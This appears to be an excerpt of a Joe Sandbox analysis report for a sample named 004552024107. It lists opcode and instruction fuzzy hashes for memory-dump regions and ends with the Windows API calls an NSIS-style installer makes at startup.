                                            • Opcode ID: 0dd0c08baf0fcd2cefed8b5b99a6e7dc78f4f828d97cd9c16ed4987a381ff181
                                            • Instruction ID: 51db98d22c985d64a68b9675c0da5d54af945663992e19b2442fcdc475722b2a
                                            • Opcode Fuzzy Hash: 0dd0c08baf0fcd2cefed8b5b99a6e7dc78f4f828d97cd9c16ed4987a381ff181
                                            • Instruction Fuzzy Hash: CB91B035710246DBDB09CF64E584A9DB7B2FF88364F108529E819EB294DB39ED43CB81
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e764b33273eb9a46e0a3420113b774cfb50fecefc888d5e2e36a82d2d4c27d4f
                                            • Instruction ID: 36119f74bbe2e8a3c4f22f344e226e5bb60f8b273d7173b33de5905d35e856f9
                                            • Opcode Fuzzy Hash: e764b33273eb9a46e0a3420113b774cfb50fecefc888d5e2e36a82d2d4c27d4f
                                            • Instruction Fuzzy Hash: 57711174B0024A8BDB48DF68C55879EB7F3AF89310F608529D509EB398EF34ED428B51
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8ddc310043fb7043603dd823fbad7fe9ea43778a9f965ad62735f4d7da21918e
                                            • Instruction ID: 732857b785529cdcf682cc2773f6a38aed53f2f815ff4f714b22880c1f714916
                                            • Opcode Fuzzy Hash: 8ddc310043fb7043603dd823fbad7fe9ea43778a9f965ad62735f4d7da21918e
                                            • Instruction Fuzzy Hash: 06812B34E0021A9BEB10DF68C880B8DB7B1FF89314F208599D44DAB395DB70AA85CF91
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2fb5817f4693a3dc02157eed6ce53fc0fbfb2ee7c232e6c2bb6f79ee207b6f27
                                            • Instruction ID: e29e37d2fb68301f4d44f1ae9583fec2f8db463148f16486ccc1c828e194d090
                                            • Opcode Fuzzy Hash: 2fb5817f4693a3dc02157eed6ce53fc0fbfb2ee7c232e6c2bb6f79ee207b6f27
                                            • Instruction Fuzzy Hash: 9051AE34B10249DFCB09EF78D555A9DB7B2FF88314B208468E41AAB345DF35ED068B80
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8d87d620f179b67f748e6a823564f7429e5590185d3fe97bc0883c6061601175
                                            • Instruction ID: 0d64b63fd54e63a3f0cb42ba1246295934d135b8d94080e156a251354f662b02
                                            • Opcode Fuzzy Hash: 8d87d620f179b67f748e6a823564f7429e5590185d3fe97bc0883c6061601175
                                            • Instruction Fuzzy Hash: B551AC71A01205CFDB14CF69E884699FBB2FF88310F24C169E8189F346E770D846CB90
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ac3ef825be6674ba18a5f8105ad41de44db63038f9195158330703ddf144183
                                            • Instruction ID: 4e332c4854e7fa7c7ddb4dfae35da407be26c4cb6885672baf3be34aaaaf40f0
                                            • Opcode Fuzzy Hash: 0ac3ef825be6674ba18a5f8105ad41de44db63038f9195158330703ddf144183
                                            • Instruction Fuzzy Hash: 5C512474E00218CFDB18CFA9C889B9DBBB1FF48301F548529D825BB355DB74A848CB95
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3890d84e993d82edb285d239d8a40a9ce7ce733f35453a3d910e40ce49916f53
                                            • Instruction ID: 8f1f14955322e56684308556a2582a638b21a1aafc1dabb9f8aaa0d4299753c0
                                            • Opcode Fuzzy Hash: 3890d84e993d82edb285d239d8a40a9ce7ce733f35453a3d910e40ce49916f53
                                            • Instruction Fuzzy Hash: 68512374E00218CFDB14CFA9C889B9DBBB1FF48301F548529D829BB395D774A848CB95
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 975018ec71a3504db03e64f4b667c1c9259015e1c876ec21c01b5a7e95312cc9
                                            • Instruction ID: e0139fef5633fc9eda7110b2b18f57e29fad269a07bf2854a017a798ce4e2143
                                            • Opcode Fuzzy Hash: 975018ec71a3504db03e64f4b667c1c9259015e1c876ec21c01b5a7e95312cc9
                                            • Instruction Fuzzy Hash: C2417179A006499FEB20CF98C9C0ADFF7B2FF44320F108926D25AD7650D735E9459B91
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0fd1cd7710270692bfc5b5b5af3f9f9ef8bf7769abc0288ad5fe56e53c0d5565
                                            • Instruction ID: 1d8c7edb2497c2862713474c1c721470f934bd07e8f1c353d31c27fc28661012
                                            • Opcode Fuzzy Hash: 0fd1cd7710270692bfc5b5b5af3f9f9ef8bf7769abc0288ad5fe56e53c0d5565
                                            • Instruction Fuzzy Hash: 4A413071D00348DFCB10CFA9C984A8EBFB1BF09314F648429E819AB214DB75A94ACB90
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6da0f353f3574d8392011b63101a0379031f6ec4268bbf0470cd54059f591ee4
                                            • Instruction ID: 795bc3001206ae4e44b9fe0c6dcdbf492c93f2c19f34c99be9b706b2a36df85f
                                            • Opcode Fuzzy Hash: 6da0f353f3574d8392011b63101a0379031f6ec4268bbf0470cd54059f591ee4
                                            • Instruction Fuzzy Hash: 3F318331E1030ACBCB19CF64C68569EB7F6FF85304F108929E815BB240EB71EE468B41
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4af3601a3c0205a4dec54c0c9d08b830462b7d23b82495b63ad69a02d7b2c77c
                                            • Instruction ID: 62db60afbea758bdb005f524a9dfee18c1509804e2d2ec294e3204b9fbc94258
                                            • Opcode Fuzzy Hash: 4af3601a3c0205a4dec54c0c9d08b830462b7d23b82495b63ad69a02d7b2c77c
                                            • Instruction Fuzzy Hash: F8411CB1D00348DFCB10CFA9C984A9EBFB5FF48314F648429E819AB254DB75A949CB90
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6aa81239a997ed4fad20384b62a238a8c9f4ef22c6eaaae016efc34898e63a2b
                                            • Instruction ID: a59c17d05283ae35752e91a2a5ad1682bdb1df2fa8e0fa7cb988ee4a45c7c852
                                            • Opcode Fuzzy Hash: 6aa81239a997ed4fad20384b62a238a8c9f4ef22c6eaaae016efc34898e63a2b
                                            • Instruction Fuzzy Hash: 8631B230605201EBDF775B38E86832D3B55EB56766F140CAAEC16CF691DF28CE888752
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cfe373cb8c7200c53263f2bde00ec46c7b73d32357b20b05e991cadf266ea089
                                            • Instruction ID: 1ddbd47ac6396aaa7cffd9da01a2d63f29800e5e229341c291001ddb084f92fc
                                            • Opcode Fuzzy Hash: cfe373cb8c7200c53263f2bde00ec46c7b73d32357b20b05e991cadf266ea089
                                            • Instruction Fuzzy Hash: 35218D75F103459FDB04CFA9D940A9EBBF2AF48710F108069E909EB344EB35D842CB90
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aef91577c628429923506d8bfac136960f0a454f098c72b2238f9a9614f20ce1
                                            • Instruction ID: 64333f039e7c912088fcf63eddaa233ccefba4e05ece92df764a09f39124391f
                                            • Opcode Fuzzy Hash: aef91577c628429923506d8bfac136960f0a454f098c72b2238f9a9614f20ce1
                                            • Instruction Fuzzy Hash: C1214F31E10209DBCB09CF64C94569EFBB2EF89300F108619E815BB240EB719D4ACB90
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0c40307cfc25ad388f44f5f56dfa04a5578408b1dfa08390af5bbed80d1a3154
                                            • Instruction ID: 7821a3f735eeeaf88dc0cb27d33c667dba47a60779059a935ed2e4e9a11f1e81
                                            • Opcode Fuzzy Hash: 0c40307cfc25ad388f44f5f56dfa04a5578408b1dfa08390af5bbed80d1a3154
                                            • Instruction Fuzzy Hash: 8A217A75A103599FDB04CFA9DD80A9EBBF6EF48710F108029EA09E7344EB35D901CB91
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5ffee9180b0ad349a944c056ff881374d376165c8addb2acdddf0cd253ec0bbe
                                            • Instruction ID: 423cb00dbecac5dae7336109533b81627e7fb232c80498bd47ad4a0f5f4295e2
                                            • Opcode Fuzzy Hash: 5ffee9180b0ad349a944c056ff881374d376165c8addb2acdddf0cd253ec0bbe
                                            • Instruction Fuzzy Hash: AE218030B04208DFDB6ADB74C5257AEB7F6AF49346F100468D416EF2A0DB358D45CB91
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6a708a842e395603937f42a309122cfd1620b6f5e9b3e48d982f819ccfe28e07
                                            • Instruction ID: 1784c92816784c5b79a337f1ac08a7bbcdd9b5e85e0795d2f4fa4bd742c471bc
                                            • Opcode Fuzzy Hash: 6a708a842e395603937f42a309122cfd1620b6f5e9b3e48d982f819ccfe28e07
                                            • Instruction Fuzzy Hash: 68211934610204CFDB18EF78D568A9E7BF2EF49305F2045A9E806EB3A1DB359D45CB91
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6139193252.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_ad000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c966ed5a27acb3796c31e106517be1560df89a2d78e902a4d1b5b57e6b21b093
                                            • Instruction ID: 2b329ac2fb8c37ec4b78eae0810e650ea66cf10931256d42ad0cbdc9dd26845f
                                            • Opcode Fuzzy Hash: c966ed5a27acb3796c31e106517be1560df89a2d78e902a4d1b5b57e6b21b093
                                            • Instruction Fuzzy Hash: 71212270604240DFDB25CF64D984F1ABBA5EB89314F24C96AD84A4B686C33BD806CB62
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: afad2496df465472e03e82fa10f0258ae84f224c23fc342e97b576ef21075407
                                            • Instruction ID: 87c269565e4a006fcea8417d1a646753aa784b186a62f1d32223bbf003010f4c
                                            • Opcode Fuzzy Hash: afad2496df465472e03e82fa10f0258ae84f224c23fc342e97b576ef21075407
                                            • Instruction Fuzzy Hash: BA211031E00319DBDB19CFA4C95459EBBB2AF89315F11862AEC25FB350DB70AC49CB90
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7b1c8000576a9316fc50ba4a716243b4e7c2f6589601be2f837b515705b21675
                                            • Instruction ID: 21fbe8f7d8e2d7b70e7f5ef83280a8d3cca9e48d326e0f23333e59d652ab7936
                                            • Opcode Fuzzy Hash: 7b1c8000576a9316fc50ba4a716243b4e7c2f6589601be2f837b515705b21675
                                            • Instruction Fuzzy Hash: D0115936F00344DFDF51ABB58C4865EBFB5EF49310F10416AE852DB285EB348942C791
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e108d228145a843c4e03c3d9e5e09c65ebda7bbca60ef47254373de8304bb5d9
                                            • Instruction ID: 2d102294a7a796ad8b7c5ef32704f33e8dcb955822462e26ab391665c98f7676
                                            • Opcode Fuzzy Hash: e108d228145a843c4e03c3d9e5e09c65ebda7bbca60ef47254373de8304bb5d9
                                            • Instruction Fuzzy Hash: 56115E35B5012D8BDB09DA78C9186AEB3FAEFC8250F11453DD50AE7348EE29DC028BD1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 278c181dde34a66ffc86425ace9187bf026acf99214bde95fe3ac3d1f7e89bfd
                                            • Instruction ID: dfc70c151f3addc4a59cda92619918deea6c46e56007a9566fe5890c8d352f05
                                            • Opcode Fuzzy Hash: 278c181dde34a66ffc86425ace9187bf026acf99214bde95fe3ac3d1f7e89bfd
                                            • Instruction Fuzzy Hash: A4119131A04224DFCB22ABB4844529D7BF5EF89311F1504BAE815DB202E735C9458B91
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ad6aaea3382ebb31da4f8bf292c8158c4b84f9c2ffb0a65d4ac03d18fcf0514c
                                            • Instruction ID: 52947612616b7d6555063db55ac235e1e975126be18115c812517820174a9018
                                            • Opcode Fuzzy Hash: ad6aaea3382ebb31da4f8bf292c8158c4b84f9c2ffb0a65d4ac03d18fcf0514c
                                            • Instruction Fuzzy Hash: 6701B132B401594BDB099A78CC186DFB7AB9FC9650F11013DD50AEB248EE258C0247D1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 76f3886f719793a0a4e280103c141a82dee750106d96b215161b7a6f9bb2442b
                                            • Instruction ID: fc2a2ac18ced01bb5f630312db06281c0dd8078a784a80f2cd50e8d83019f408
                                            • Opcode Fuzzy Hash: 76f3886f719793a0a4e280103c141a82dee750106d96b215161b7a6f9bb2442b
                                            • Instruction Fuzzy Hash: 1B21FFB5D01259AFCB00CF9AD984ADEFFB8FF49320F50852AE518A7200C375A950CBA5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f16121f7a7eaaf38e3f29d70a147dde5baab12dad824b497fd7ace3c3914aa3f
                                            • Instruction ID: cbfe78655f6c8e739c4aca19e03031239ef050112148af8eafc7ae308ea4f9db
                                            • Opcode Fuzzy Hash: f16121f7a7eaaf38e3f29d70a147dde5baab12dad824b497fd7ace3c3914aa3f
                                            • Instruction Fuzzy Hash: 9B012E31B083028FCB129B75995892EBBFBAF84714358407AD806CF2A5FF70CD0987A1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bbf297fec534d8f9fb58dcdab2d494f74668fed0d14486d624ec966554b36734
                                            • Instruction ID: 6ce728e48b505aa3ab8ff99c8aa01875eb8282b8fb3b2e6c42d233bea5228175
                                            • Opcode Fuzzy Hash: bbf297fec534d8f9fb58dcdab2d494f74668fed0d14486d624ec966554b36734
                                            • Instruction Fuzzy Hash: 4E01D275B00215EFCF55ABB99C4875EBBE6FB8C260F204529E90AD3344EF348A428790
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6139193252.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_ad000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 34f2a8f076c56e363620ceb16907067b30c4610874422089db26ac2c4dde0281
                                            • Instruction ID: a2ff19c1d2df50ad1f4d357ef08ff529c5fe1916188d217ce018c6c7a213db01
                                            • Opcode Fuzzy Hash: 34f2a8f076c56e363620ceb16907067b30c4610874422089db26ac2c4dde0281
                                            • Instruction Fuzzy Hash: DF119D75504280DFDB11CF54D5C4B15FBA2FB89314F24C6AED84A4BA56C33BD84ACBA2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2225ac944b2b73eb0c2beb572644a64fd11381798478cec2c92207feece350d1
                                            • Instruction ID: 9145bd7d6549eb696c85600405f9730828415edf3f801c5cc1a11ed2e0f12518
                                            • Opcode Fuzzy Hash: 2225ac944b2b73eb0c2beb572644a64fd11381798478cec2c92207feece350d1
                                            • Instruction Fuzzy Hash: 54016D71A00224DFCB22EFB884452AE7BE6EF89312F21047AE815EB301E731DD458B91
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6d9b003f77ff0db950c0bb1657818d9b3ff6d039e93d3a09ad812d714b6108b5
                                            • Instruction ID: e611acbdaefc09eca561139829d33e2f5a7e5db6f90d3157589769671ef17a91
                                            • Opcode Fuzzy Hash: 6d9b003f77ff0db950c0bb1657818d9b3ff6d039e93d3a09ad812d714b6108b5
                                            • Instruction Fuzzy Hash: 4F11D0B5D01219AFCB00CF9AD984ADEFBB4FF48720F50852AE518A7200C375A954CBA5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4544067a853f4bfb3a1e39baaf571bb2cfd6ec970fd8bc8d4d56de61a37dbcd3
                                            • Instruction ID: 50c0d6b8b1649400a0d98c656770e23df1f1ceb3b1f6c8bdc515ea803c5e85d5
                                            • Opcode Fuzzy Hash: 4544067a853f4bfb3a1e39baaf571bb2cfd6ec970fd8bc8d4d56de61a37dbcd3
                                            • Instruction Fuzzy Hash: 110186357002605BE7189A6DD459B0FB7EACFC9A60F20883DE80EDB340EA6ADC020384
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 667457659750042677b72e0139a06b78c5a0930adcdadf27d2a56a2182af877f
                                            • Instruction ID: 4337073129b8782b7316646a6f9139fe0c755c19405d7209c31b72167eee8c6a
                                            • Opcode Fuzzy Hash: 667457659750042677b72e0139a06b78c5a0930adcdadf27d2a56a2182af877f
                                            • Instruction Fuzzy Hash: BA018C317005109BCB299A2DC558B2EB3DADBC9B25F10883DE90EDB344EF25DC074785
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 233bf940aeb48617adea571bfc6aa43c114f27e36e2fd59b12f5704a20e8b972
                                            • Instruction ID: f98ce60210de2f57c8c0aeb16c0aa15592a38449a48eee4cd3024fbadd6b794d
                                            • Opcode Fuzzy Hash: 233bf940aeb48617adea571bfc6aa43c114f27e36e2fd59b12f5704a20e8b972
                                            • Instruction Fuzzy Hash: 1E01A231B042158BCB14AF79994852FB7EBAFC47653984439D816CB254FF70CD054690
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ec7f656abf3903e28637d5de12fa929d66e857ff22ad56ba125c6104e6f3ecee
                                            • Instruction ID: f06d6835f0fa3e4462078dc5620da0f2ff1bab87b1045a0175f271f3a8120904
                                            • Opcode Fuzzy Hash: ec7f656abf3903e28637d5de12fa929d66e857ff22ad56ba125c6104e6f3ecee
                                            • Instruction Fuzzy Hash: FA01F470B04214DFDB44EB78990236E7AE5AF09300F208469E918EB385E736CA068BD5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 29d9ccf450845e920ac4d53c6932c1f3f2f1e8025e1c5b101c1aa7ca727ae2c1
                                            • Instruction ID: 80c6ff97bb367de054e87499e11e32d4405a0ea2a04beb4ba5cfb1b33754c6f9
                                            • Opcode Fuzzy Hash: 29d9ccf450845e920ac4d53c6932c1f3f2f1e8025e1c5b101c1aa7ca727ae2c1
                                            • Instruction Fuzzy Hash: 7EF0F930B0C112C7E7241A79B82836626689B20743FA54477BC32CF5D0EF49D9CC92E2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5f8fd33e481b1023286fbf96bf0785a76ebae0675e2fe290f6e34e688e2a146f
                                            • Instruction ID: 854f5e18971371918a8139861e3682d7d719a55ecb52ca2b5e45ab53a91fd375
                                            • Opcode Fuzzy Hash: 5f8fd33e481b1023286fbf96bf0785a76ebae0675e2fe290f6e34e688e2a146f
                                            • Instruction Fuzzy Hash: 0DF0FC33504150DFC7239BE498512AC7BA1EE9A313B5904D7DC11DF212D334D845D751
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d30cc2c539ed32ff769f09a1513e3f66d8ab7200f538e67bb963a1676c8f87ce
                                            • Instruction ID: b0253af15f18837d05826b4554e0a7d171dbc882350fac33852162c9d4ea259d
                                            • Opcode Fuzzy Hash: d30cc2c539ed32ff769f09a1513e3f66d8ab7200f538e67bb963a1676c8f87ce
                                            • Instruction Fuzzy Hash: 40E086017092D10BE30766385E147562B945F83694B0600FAD155DF793EA19CE06CBA2
                                            APIs
                                            • SetErrorMode.KERNEL32(00008001), ref: 004033FB
                                            • GetVersionExA.KERNEL32(?), ref: 00403424
                                            • GetVersionExA.KERNEL32(0000009C), ref: 0040343B
                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403504
                                            • #17.COMCTL32(?,00000008,0000000A,0000000C), ref: 00403541
                                            • OleInitialize.OLE32(00000000), ref: 00403548
                                            • SHGetFileInfoA.SHELL32(00429448,00000000,?,00000160,00000000,?,00000008,0000000A,0000000C), ref: 00403566
                                            • GetCommandLineA.KERNEL32(0042E820,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040357B
                                            • CharNextA.USER32(00000000,00435000,00000020,00435000,00000000,?,00000008,0000000A,0000000C), ref: 004035B5
                                            • GetTempPathA.KERNEL32(00000400,00436400,00000000,00000020,?,00000008,0000000A,0000000C), ref: 004036AE
                                            • GetWindowsDirectoryA.KERNEL32(00436400,000003FB,?,00000008,0000000A,0000000C), ref: 004036BF
                                            • lstrcatA.KERNEL32(00436400,\Temp,?,00000008,0000000A,0000000C), ref: 004036CB
                                            • GetTempPathA.KERNEL32(000003FC,00436400,00436400,\Temp,?,00000008,0000000A,0000000C), ref: 004036DF
                                            • lstrcatA.KERNEL32(00436400,Low,?,00000008,0000000A,0000000C), ref: 004036E7
